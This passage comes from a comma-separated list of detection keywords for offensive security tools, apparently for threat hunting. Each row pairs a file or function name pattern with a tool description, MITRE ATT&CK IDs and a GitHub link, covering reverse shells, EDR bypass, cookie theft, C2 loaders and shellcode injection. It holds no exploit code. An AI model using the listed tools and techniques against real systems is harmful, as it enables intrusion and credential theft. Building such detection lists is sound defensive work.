tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*ConPtyShell_dotnet2.exe*,offensive_tool_keyword,ConPtyShell,ConPtyShell - Fully Interactive Reverse Shell for Windows,T1021 - T1071,TA0002,N/A,N/A,Exploitation 
tools,https://github.com/antonioCoco/ConPtyShell,1,1,N/A,N/A,9,817,150,2023-01-20T10:52:52Z,2019-09-13T22:11:18Z -*-consoleoutput -DomainRecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*-consoleoutput -Localrecon*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*contact_harvester*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ContainYourself.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourself.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourself.sln*,offensive_tool_keyword,ContainYourself,Abuses the 
Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourself-main*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfPoc.cpp*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfPoc.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfPoc\*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContainYourselfTempFile.txt*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*ContentHijacking.swf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ConvertFrom-LDAPLogonHours*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Convert-NT4toCanonical*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during 
all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ConvertTo-LogonHoursArray*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ConvertTo-Rc4ByteStream*,offensive_tool_keyword,empire,empire function name. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ConvertTo-ROT13.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*ConvertTo-Shellcode -*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,0,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*ConvertToShellcode*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*ConvertTo-Shellcode.*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*ConvertTo-Shellcode.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*ConvertToShellcode.py*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z 
-*ConvertToShellcode.py*,offensive_tool_keyword,sRDI,Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/monoxgas/sRDI,1,1,N/A,N/A,10,1855,445,2022-12-14T16:01:43Z,2017-07-28T19:30:53Z -*cookie_graber_x64.o*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*cookie-graber.c*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*cookie-graber_x64.exe*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*Cookie-Graber-BOF*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*CookieProcessor.exe*,offensive_tool_keyword,cobaltstrike,C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.,T1552.002 - T1027.001 - T1059.003 - T1003.001,TA0006 - TA0005 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF,1,1,N/A,10,10,104,14,2023-05-28T18:41:15Z,2023-05-28T18:30:02Z -*cool*/cool.zip*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*CoolerVoid/0d1n*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*coolv0.1.exe*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z -*Cooolis*shellcode*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CooolisAdjustTokenPrivileges*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CooolisCreateRemoteThread*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-ExternalC2*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-ms.exe*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-msf*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-msX64.zip*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-msX86.zip*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*Cooolis-Reflective*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 